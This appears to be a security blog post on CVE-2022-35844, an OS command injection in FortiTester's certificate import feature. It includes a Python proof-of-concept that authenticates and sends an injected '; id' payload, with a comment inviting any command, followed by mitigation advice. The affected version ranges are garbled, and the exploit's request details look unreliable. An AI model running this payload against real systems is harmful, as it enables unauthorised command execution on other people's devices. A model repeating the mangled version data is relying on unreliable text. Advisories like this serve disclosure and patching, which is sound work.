A critical vulnerability (CVE-2022-35844) has been identified in FortiTester, affecting versions 2.3. through 3.9.1, 4.. through 4.2., and 7.. through 7.1.. This vulnerability stems from improper neutralization of special elements used in an OS command [CWE-78] within the management interface. As a result, an authenticated attacker can potentially execute unauthorized commands via specifically crafted arguments related to the certificate import feature. This post will discuss the exploit details, along with providing code snippets and links to original references.

Technical Overview

The flaw lies in FortiTester's management interface, wherein special elements are not adequately neutralized in OS commands. This allows any authenticated user who can interact with the certificate import feature to inject their arbitrary commands within the interface, leading to unauthorized command execution.

This vulnerability can be exploited by sending a specifically crafted request to the management interface with injected arguments in the commands related to the certificate import feature.

The following code snippet demonstrates the exploitation of this vulnerability in a Python script

import requests

# Replace the placeholders with the target IP address and your credentials
TARGET_IP = 'x.x.x.x'
USERNAME = 'your_username'
PASSWORD = 'your_password'

# Authentication
url = f'https://{TARGET_IP}/jsonrpc';
data = {"params": [USERNAME, PASSWORD, ""], "method": "user.login", "id": 1}
response = requests.post(url, json=data, verify=False)
user_token = response.json()['result']['user_token']

# Exploit the vulnerability
cmd_injection_payload = "; id"  # You can replace 'id' with any command you want to execute on the target server.
data = {
    "params": [
        user_token,
        {
            "uploaded_file": cmd_injection_payload,
            "filename": "malicious_key.pem",
            "type": "private_key"
        }
    ],
    "method": "ft.import_cert",
    "id": 2}


response = requests.post(url, json=data, verify=False)
print(response.text)

When the above script runs against a vulnerable FortiTester instance, it will attempt to execute the injected command on the target server. In this example, the id command would be run.

For more details about the vulnerability, refer to the original advisory at

- Fortinet Advisory: FG-IR-21-067
- CVE-2022-35844
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Mitigation

To protect against this vulnerability, users are advised to update their FortiTester devices to the following firmware versions, as recommended by Fortinet:

For FortiTester 7.x, update to version 7.1.1 or later.

Users should also follow the principle of least privilege and limit access to commands based on the user role.

Conclusion

The discovery of CVE-2022-35844 highlights the importance of thorough secure coding practices and monitoring for security issues in network devices like FortiTester. By updating to the latest firmware, limiting command access to appropriate users, and staying informed of new threats and vulnerabilities, organizations can better protect themselves from unauthorized command execution attacks.

Timeline

Published on: 10/18/2022 14:15:00 UTC
Last modified on: 10/20/2022 18:50:00 UTC